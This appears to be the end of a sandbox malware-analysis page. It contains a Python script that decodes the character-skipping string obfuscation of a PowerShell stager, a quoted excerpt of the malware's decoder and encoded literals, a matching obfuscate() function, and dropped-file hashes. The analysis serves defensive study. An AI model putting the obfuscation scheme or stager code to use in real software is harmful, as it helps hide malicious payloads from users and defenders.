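LOOP_RE = re.compile(r"for\(\s*\$(\w+)=(\d+);\s*\$\1\s+-lt\s+\$\w+;\s*\$\1\+=(\d+)\)")

# Every obfuscated literal is passed to Forhandlingsresultat; capture the variable it feeds, if any.
LITERAL_RE = re.compile(r"(?:\$(\w+)\s*=\s*)?Forhandlingsresultat\s+'([^']*)'")

# Constructed excerpt: the decoder body plus three literals copied verbatim from the command line above.
SAMPLE = (
    "function Forhandlingsresultat($Minyae){If ($Soilless) {$Aendrings++;}"
    "$Underminister=$Syttenaariges+$Minyae.'Length'-$Aendrings; "
    "for( $outdrag=5;$outdrag -lt $Underminister;$outdrag+=6){"
    "$Isklumper+=$Minyae[$outdrag];}$Isklumper;}"
    "$Manutagi=Forhandlingsresultat ' SynsU earlS f rhE areoRsaldo-SedatASkaf,GStemnEPengen.ncontDrypn ';"
    "$Forkromningens=Forhandlingsresultat 'Overp>Tribu ';"
    "$Conacaste=Forhandlingsresultat 'Sublai hivaeButtexUntri ';"
)


def loop_parameters(script):
    """Return (start, stride) exactly as written in the decoder's own loop."""
    m = LOOP_RE.search(script)
    if m is None:
        raise ValueError("decoder loop not found; the scheme may have changed")
    return int(m.group(2)), int(m.group(3))


def decode(blob, start=5, stride=6, trim_last=1):
    """Keep blob[start], blob[start+stride], ... while the index stays below len(blob) - trim_last.
    trim_last models $Aendrings, which is 1 in any real host because $host.UI is non-null,
    so the scan never reaches the final filler character."""
    limit = len(blob) - trim_last
    return "".join(blob[i] for i in range(start, limit, stride))


def decode_literals(script):
    """Decode every literal handed to the decoder; returns (assigned variable or None, plaintext) pairs."""
    start, stride = loop_parameters(script)
    return [(name or None, decode(blob, start, stride)) for name, blob in LITERAL_RE.findall(script)]


def obfuscate(plain, start=5, stride=6, filler="abcdefghijklmnopqrstuvwxyz"):
    """Hypothetical inverse, used only to build round-trip fixtures: `start` junk characters before the
    first real one, `stride - 1` before each later one, and one trailing junk character for the decoder to skip."""
    pos = 0

    def junk(n):
        nonlocal pos
        s = "".join(filler[(pos + i) % len(filler)] for i in range(n))
        pos += n
        return s

    pieces = [junk(start if idx == 0 else stride - 1) + ch for idx, ch in enumerate(plain)]
    pieces.append(junk(1))
    return "".join(pieces)


if __name__ == "__main__":
    for name, text in decode_literals(SAMPLE):
        print(f"{name or '<inline>'}: {text!r}")
```

Run over the full command line, the remaining literals yield the HTTP User-Agent, the second-stage download URL on the abused hosting service the signatures flag, and the rest of the stager logic. One caveat: the rendering on this page collapses runs of spaces inside the literals, so the longer strings decode with characters missing when copied from here; feed the decoder the raw command line captured by the sandbox instead.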
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 469KB
MD5: 598347a0bcbbbba59adef833a5b27d72
SHA1: 149039d2fea4a3a940884c9eb8689d59a957a4a2
SHA256: ed6dd1b56c22e70a8f7ed2582803ce7731ab5d3210a065d26d34e2ac78e5ef6b
SHA512: ae6d040c03aef912f53a29596d25be5832d7faa42ba41b64c287a633f483dd09f26818687fcc5155b1873433a1482cd53357b5b414e6dc4652ae600c3739b236

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L5L3OL3Y3TN603874OXJ.temp
Filesize: 7KB
MD5: 86c38ce4cd9374f6bc9de3b7f0afb755
SHA1: b1ba19185fdb868b72f338ad9404c3ce653abcac
SHA256: a40242bde4e13db4dac67d4c0c6154fad454b0e36a350d6350914ba15fb9559d
SHA512: 08b3471056b545065bfcd5960dcad23919dfe85eac51345ee176d89093474032d85813c8ba4764fc5f7bcb27f84acf9e2fa4efda7c3e9945da168077b05c5a7a